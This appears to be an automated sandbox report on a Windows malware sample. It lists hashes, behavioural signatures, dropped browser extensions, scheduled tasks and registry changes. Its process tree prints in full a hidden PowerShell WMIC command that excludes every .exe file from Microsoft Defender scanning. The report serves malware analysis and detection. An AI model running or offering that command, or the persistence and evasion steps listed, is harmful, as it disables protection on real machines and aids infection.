Analysis
-
max time kernel
141s -
max time network
145s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
07-04-2024 17:00
Static task
static1
Behavioral task
behavioral1
Sample
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe
Resource
win10v2004-20240226-en
General
-
Target
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe
-
Size
6.3MB
-
MD5
0cf48faa3cba7cfc078ff3d838f7d86d
-
SHA1
edd38d6e966e365b290ff2ce88a432e17d1bb4eb
-
SHA256
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833
-
SHA512
53e00faae2d1ee0d163f78f56270fd4c21243b0a64611ea4ef220af6066510f9d75b6556b968ddbad67c220bc1eeb201c1b80e18215a054c376c48b068ce153e
-
SSDEEP
196608:91Oc73gCvR7IDbay+twm5R45TN+Bg8OPcDAjVUOE:3Occ4ly+tdUM+8FEjDE
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid Process 17 4352 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ZBAfLYQ.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation ZBAfLYQ.exe -
Executes dropped EXE 3 IoCs
Processes:
Install.exeLwcHoZo.exeZBAfLYQ.exepid Process 3416 Install.exe 3016 LwcHoZo.exe 5100 ZBAfLYQ.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid Process 4352 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
ZBAfLYQ.exedescription ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json ZBAfLYQ.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json ZBAfLYQ.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
ZBAfLYQ.exedescription ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini ZBAfLYQ.exe -
Drops file in System32 directory 31 IoCs
Processes:
LwcHoZo.exeZBAfLYQ.exepowershell.exepowershell.exepowershell.exedescription ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini LwcHoZo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 ZBAfLYQ.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol LwcHoZo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 ZBAfLYQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ZBAfLYQ.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ZBAfLYQ.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 ZBAfLYQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 ZBAfLYQ.exe -
Drops file in Program Files directory 14 IoCs
Processes:
ZBAfLYQ.exedescription ioc Process File created C:\Program Files (x86)\YrliKKkuhgWU2\IDhYlhm.xml ZBAfLYQ.exe File created C:\Program Files (x86)\ycfBUKIjHxeOC\wxdYbvp.dll ZBAfLYQ.exe File created C:\Program Files (x86)\ycfBUKIjHxeOC\PxTyDEW.xml ZBAfLYQ.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZBAfLYQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ZBAfLYQ.exe File created C:\Program Files (x86)\YrliKKkuhgWU2\bICytrPDqVyEw.dll ZBAfLYQ.exe File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\XWITLon.xml ZBAfLYQ.exe File created C:\Program Files (x86)\orRvbnhdU\IyrDVE.dll ZBAfLYQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja ZBAfLYQ.exe File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\rkxrljj.dll ZBAfLYQ.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ZBAfLYQ.exe File created C:\Program Files (x86)\orRvbnhdU\HJtjZab.xml ZBAfLYQ.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi ZBAfLYQ.exe File created C:\Program Files (x86)\IgAQuzzvNCUn\wvuTXUU.dll ZBAfLYQ.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc Process File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job schtasks.exe File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job schtasks.exe File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job schtasks.exe File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 3732 schtasks.exe 4300 schtasks.exe 1704 schtasks.exe 3908 schtasks.exe 2228 schtasks.exe 2144 schtasks.exe 2948 schtasks.exe 440 schtasks.exe 416 schtasks.exe 4940 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exeZBAfLYQ.exepowershell.exerundll32.exeLwcHoZo.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ZBAfLYQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ZBAfLYQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" ZBAfLYQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ZBAfLYQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "2" LwcHoZo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ZBAfLYQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEZBAfLYQ.exepowershell.exepid Process 2388 powershell.exe 2388 powershell.exe 1304 powershell.exe 1304 powershell.exe 2272 powershell.exe 2272 powershell.exe 4728 powershell.EXE 4728 powershell.EXE 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 2008 powershell.exe 2008 powershell.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe 5100 ZBAfLYQ.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeWMIC.exepowershell.exepowershell.exepowershell.EXEpowershell.exeWMIC.exedescription pid Process Token: SeDebugPrivilege 2388 powershell.exe Token: SeIncreaseQuotaPrivilege 2808 WMIC.exe Token: SeSecurityPrivilege 2808 WMIC.exe Token: SeTakeOwnershipPrivilege 2808 WMIC.exe Token: SeLoadDriverPrivilege 2808 WMIC.exe Token: SeSystemProfilePrivilege 2808 WMIC.exe Token: SeSystemtimePrivilege 2808 WMIC.exe Token: SeProfSingleProcessPrivilege 2808 WMIC.exe Token: SeIncBasePriorityPrivilege 2808 WMIC.exe Token: SeCreatePagefilePrivilege 2808 WMIC.exe Token: SeBackupPrivilege 2808 WMIC.exe Token: SeRestorePrivilege 2808 WMIC.exe Token: SeShutdownPrivilege 2808 WMIC.exe Token: SeDebugPrivilege 2808 WMIC.exe Token: SeSystemEnvironmentPrivilege 2808 WMIC.exe Token: SeRemoteShutdownPrivilege 2808 WMIC.exe Token: SeUndockPrivilege 2808 WMIC.exe Token: SeManageVolumePrivilege 2808 WMIC.exe Token: 33 2808 WMIC.exe Token: 34 2808 WMIC.exe Token: 35 2808 WMIC.exe Token: 36 2808 WMIC.exe Token: SeIncreaseQuotaPrivilege 2808 WMIC.exe Token: SeSecurityPrivilege 2808 WMIC.exe Token: SeTakeOwnershipPrivilege 2808 WMIC.exe Token: SeLoadDriverPrivilege 2808 WMIC.exe Token: SeSystemProfilePrivilege 2808 WMIC.exe Token: SeSystemtimePrivilege 2808 WMIC.exe Token: SeProfSingleProcessPrivilege 2808 WMIC.exe Token: SeIncBasePriorityPrivilege 2808 WMIC.exe Token: SeCreatePagefilePrivilege 2808 WMIC.exe Token: SeBackupPrivilege 2808 WMIC.exe Token: SeRestorePrivilege 2808 WMIC.exe Token: SeShutdownPrivilege 2808 WMIC.exe Token: SeDebugPrivilege 2808 WMIC.exe Token: SeSystemEnvironmentPrivilege 2808 WMIC.exe Token: SeRemoteShutdownPrivilege 2808 WMIC.exe Token: SeUndockPrivilege 2808 WMIC.exe Token: SeManageVolumePrivilege 2808 WMIC.exe Token: 33 2808 WMIC.exe Token: 34 2808 WMIC.exe Token: 35 2808 WMIC.exe Token: 36 2808 WMIC.exe Token: SeDebugPrivilege 1304 powershell.exe Token: SeDebugPrivilege 2272 powershell.exe Token: SeDebugPrivilege 4728 powershell.EXE Token: SeDebugPrivilege 2008 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4924 WMIC.exe Token: SeIncreaseQuotaPrivilege 4924 WMIC.exe Token: SeSecurityPrivilege 4924 WMIC.exe Token: SeTakeOwnershipPrivilege 4924 WMIC.exe Token: SeLoadDriverPrivilege 4924 WMIC.exe Token: SeSystemtimePrivilege 4924 WMIC.exe Token: SeBackupPrivilege 4924 WMIC.exe Token: SeRestorePrivilege 4924 WMIC.exe Token: SeShutdownPrivilege 4924 WMIC.exe Token: SeSystemEnvironmentPrivilege 4924 WMIC.exe Token: SeUndockPrivilege 4924 WMIC.exe Token: SeManageVolumePrivilege 4924 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4924 WMIC.exe Token: SeIncreaseQuotaPrivilege 4924 WMIC.exe Token: SeSecurityPrivilege 4924 WMIC.exe Token: SeTakeOwnershipPrivilege 4924 WMIC.exe Token: SeLoadDriverPrivilege 4924 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exeInstall.exeforfiles.execmd.exepowershell.exeLwcHoZo.exepowershell.execmd.exedescription pid Process procid_target PID 648 wrote to memory of 3416 648 d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe 76 PID 648 wrote to memory of 3416 648 d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe 76 PID 648 wrote to memory of 3416 648 d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe 76 PID 3416 wrote to memory of 4984 3416 Install.exe 78 PID 3416 wrote to memory of 4984 3416 Install.exe 78 PID 3416 wrote to memory of 4984 3416 Install.exe 78 PID 4984 wrote to memory of 4468 4984 forfiles.exe 80 PID 4984 wrote to memory of 4468 4984 forfiles.exe 80 PID 4984 wrote to memory of 4468 4984 forfiles.exe 80 PID 4468 wrote to memory of 2388 4468 cmd.exe 81 PID 4468 wrote to memory of 2388 4468 cmd.exe 81 PID 4468 wrote to memory of 2388 4468 cmd.exe 81 PID 2388 wrote to memory of 2808 2388 powershell.exe 82 PID 2388 wrote to memory of 2808 2388 powershell.exe 82 PID 2388 wrote to memory of 2808 2388 powershell.exe 82 PID 3416 wrote to memory of 2228 3416 Install.exe 84 PID 3416 wrote to memory of 2228 3416 Install.exe 84 PID 3416 wrote to memory of 2228 3416 Install.exe 84 PID 3016 wrote to memory of 1304 3016 LwcHoZo.exe 87 PID 3016 wrote to memory of 1304 3016 LwcHoZo.exe 87 PID 3016 wrote to memory of 1304 3016 LwcHoZo.exe 87 PID 1304 wrote to memory of 3872 1304 powershell.exe 89 PID 1304 wrote to memory of 3872 1304 powershell.exe 89 PID 1304 wrote to memory of 3872 1304 powershell.exe 89 PID 3872 wrote to memory of 912 3872 cmd.exe 90 PID 3872 wrote to memory of 912 3872 cmd.exe 90 PID 3872 wrote to memory of 912 3872 cmd.exe 90 PID 1304 wrote to memory of 1904 1304 powershell.exe 91 PID 1304 wrote to memory of 1904 1304 powershell.exe 91 PID 1304 wrote to memory of 1904 1304 powershell.exe 91 PID 1304 wrote to memory of 1560 1304 powershell.exe 92 PID 1304 wrote to memory of 1560 1304 powershell.exe 92 PID 1304 wrote to memory of 1560 1304 powershell.exe 92 PID 1304 wrote to memory of 1200 1304 powershell.exe 93 PID 1304 wrote to memory of 1200 1304 powershell.exe 93 PID 1304 wrote to memory of 1200 1304 powershell.exe 93 PID 1304 wrote to memory of 3732 1304 powershell.exe 94 PID 1304 wrote to memory of 3732 1304 powershell.exe 94 PID 1304 wrote to memory of 3732 1304 powershell.exe 94 PID 1304 wrote to memory of 3736 1304 powershell.exe 95 PID 1304 wrote to memory of 3736 1304 powershell.exe 95 PID 1304 wrote to memory of 3736 1304 powershell.exe 95 PID 1304 wrote to memory of 1640 1304 powershell.exe 96 PID 1304 wrote to memory of 1640 1304 powershell.exe 96 PID 1304 wrote to memory of 1640 1304 powershell.exe 96 PID 1304 wrote to memory of 4300 1304 powershell.exe 97 PID 1304 wrote to memory of 4300 1304 powershell.exe 97 PID 1304 wrote to memory of 4300 1304 powershell.exe 97 PID 1304 wrote to memory of 2180 1304 powershell.exe 98 PID 1304 wrote to memory of 2180 1304 powershell.exe 98 PID 1304 wrote to memory of 2180 1304 powershell.exe 98 PID 1304 wrote to memory of 3764 1304 powershell.exe 99 PID 1304 wrote to memory of 3764 1304 powershell.exe 99 PID 1304 wrote to memory of 3764 1304 powershell.exe 99 PID 1304 wrote to memory of 4100 1304 powershell.exe 100 PID 1304 wrote to memory of 4100 1304 powershell.exe 100 PID 1304 wrote to memory of 4100 1304 powershell.exe 100 PID 1304 wrote to memory of 3516 1304 powershell.exe 101 PID 1304 wrote to memory of 3516 1304 powershell.exe 101 PID 1304 wrote to memory of 3516 1304 powershell.exe 101 PID 1304 wrote to memory of 2500 1304 powershell.exe 102 PID 1304 wrote to memory of 2500 1304 powershell.exe 102 PID 1304 wrote to memory of 2500 1304 powershell.exe 102 PID 1304 wrote to memory of 1260 1304 powershell.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"C:\Users\Admin\AppData\Local\Temp\d4e6b02474cfe7ced5d87fa102e90e3d419adc2985567c65438f8debac9fa833.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:648 -
C:\Users\Admin\AppData\Local\Temp\7zS37E8.tmp\Install.exe.\Install.exe /PdidDDD "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:4984 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
